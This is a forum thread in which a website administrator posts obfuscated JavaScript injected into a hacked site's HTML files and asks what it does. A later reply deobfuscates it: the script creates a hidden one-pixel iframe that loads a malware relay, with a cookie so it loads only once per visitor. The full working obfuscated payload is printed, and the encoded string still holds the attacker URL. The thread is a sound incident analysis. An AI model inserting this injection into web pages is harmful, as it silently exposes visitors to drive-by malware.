Welcome to the Java Programming Forums


The professional, friendly Java community. 21,500 members and growing!


The Java Programming Forums are a community of Java programmers from all around the World. Our members have a wide range of skills and they all have one thing in common: A passion to learn and code Java. We invite beginner Java programmers right through to Java professionals to post here and share your knowledge. Become a part of the community, help others, expand your knowledge of Java and enjoy talking with like minded people. Registration is quick and best of all free. We look forward to meeting you.


>> REGISTER NOW TO START POSTING


Members have full access to the forums. Advertisements are removed for registered users.

Results 1 to 4 of 4

Thread: Help With deciphering Code...

  1. #1
    Junior Member
    Join Date
    May 2013
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Help With deciphering Code...

    Hello Cafe Members,

    Let me start off by sayign I'm not a Java coder and not profecient with Coding at all. I admin a few websites and do HTML mostly. I recently was advised that the FTP password was compromised on a site and when looking at the HTML, all the files were injected with this code (Also Attached)...

    <!--0c0896--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,67,5d,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,67,5d,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,62,66,6c,6a,66,60,65,69,70,66,25,65,5c,6b,26,69,5c,63,58,70,25,67,5f,67,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,67,5d,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,67,5d,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,67,5d,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,67,5d,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,67,5d,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1305!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(e(aq+(w[j]))+9);}za=e;za(s)}</script><!--/0c0896-->


    I'm trying to figure out exactly what it does and the potential damage. Thanks to any that are willing to help.
    Attached Files Attached Files


  2. #2
    Crazy Cat Lady KevinWorkman's Avatar
    Join Date
    Oct 2010
    Location
    Washington, DC
    Posts
    5,424
    My Mood
    Hungover
    Thanks
    144
    Thanked 636 Times in 540 Posts

    Default Re: Help With deciphering Code...

    Java and javascript are completely different, but I recommend giving this a read: Beating JavaScript obfuscators with Firebug
    Useful links: How to Ask Questions the Smart Way | Use Code Tags | Java Tutorials
    Static Void Games - Play indie games, learn from game tutorials and source code, upload your own games!

  3. #3
    Junior Member
    Join Date
    May 2013
    Posts
    2
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Re: Help With deciphering Code...

    Quote Originally Posted by KevinWorkman View Post
    Java and javascript are completely different, but I recommend giving this a read: Beating JavaScript obfuscators with Firebug
    Thank you for the direction, its a great start

  4. #4
    Junior Member
    Join Date
    Jun 2013
    Posts
    1
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Re: Help With deciphering Code...

    This is a exploit that has been going around for a couple weeks. Notice the '0c0896' (the hackers "tag"). You can search "0c0896 hack" online for more forum posts and information.

    Hard to read code all on one line (that was the intent)

    So using jsbeautifier

    We get:
    sp = "split";
    w = window;
    aq = "0" + "x";
    ff = String;
    z = "y";
    ff = ff.fromCharCode;
    try {
        document["\x62od" + z] ^= ~1;
    } catch (d21vd12v) {
        v = 123;
        vzs = false;
        try {
            document;
        } catch (wb) {
            vzs = 2;
        }
        if (!vzs) e = w["eval"];
        if (1) {
            f = "17,5d,6c,65,5a,6b,60,...,4,1,74,4,1" [sp](",");
        }
        w = f;
        s = [];
        for (i = 2 - 2; - i + 1305 != 0; i += 1) {
            j = i;
            if ((031 == 0x19))
                if (e) s = s + ff(e(aq + (w[j])) + 9);
        }
        za = e;
        za(s)
    }

    Now this is pretty easy to decipher. Mainly we replace all the variables back and instead of executing the window["eval"] we just paste the string using document.write and paste it between some <pre> tags
    function zzzfff() {
        var pf = document.createElement('iframe');
     
        pf.src = '--REMOVED--';
        pf.style.position = 'absolute';
        pf.style.border = '0';
        pf.style.height = '1px';
        pf.style.width = '1px';
        pf.style.left = '1px';
        pf.style.top = '1px';
     
        if (!document.getElementById('pf')) {
            document.write('
    ');
            document.getElementById('pf').appendChild(pf);
        }
    }
     
    function SetCookie(cookieName, cookieValue, nDays, path) {
        var today = new Date();
        var expire = new Date();
        if (nDays == null || nDays == 0) nDays = 1;
        expire.setTime(today.getTime() + 3600000 * 24 * nDays);
        document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    }
     
    function GetCookie(name) {
        var start = document.cookie.indexOf(name + "=");
        var len = start + name.length + 1;
        if ((!start) &&
            (name != document.cookie.substring(0, name.length))) {
            return null;
        }
        if (start == -1) return null;
        var end = document.cookie.indexOf(";", len);
        if (end == -1) end = document.cookie.length;
        return unescape(document.cookie.substring(len, end));
    }
    if (navigator.cookieEnabled) {
        if (GetCookie('visited_uq') == 55) {} else {
            SetCookie('visited_uq', '55', '1', '/');
     
            zzzfff();
        }
    }

    So it sets a cookie, and visits the URL for the site: "kousoinryo dot net slash relay dot php" listed above (and removed) but I don't advise visiting the site. It will attempt to install malware. It also acts as a "counter" for the hacker to keep track of what browsers, IPs, and referrers he is getting.

Similar Threads

  1. Replies: 3
    Last Post: April 27th, 2013, 07:19 AM
  2. Replies: 4
    Last Post: January 24th, 2013, 11:20 AM
  3. Replies: 7
    Last Post: January 24th, 2013, 10:41 AM
  4. Replies: 5
    Last Post: November 14th, 2012, 10:47 AM
  5. Replies: 3
    Last Post: September 3rd, 2012, 11:36 AM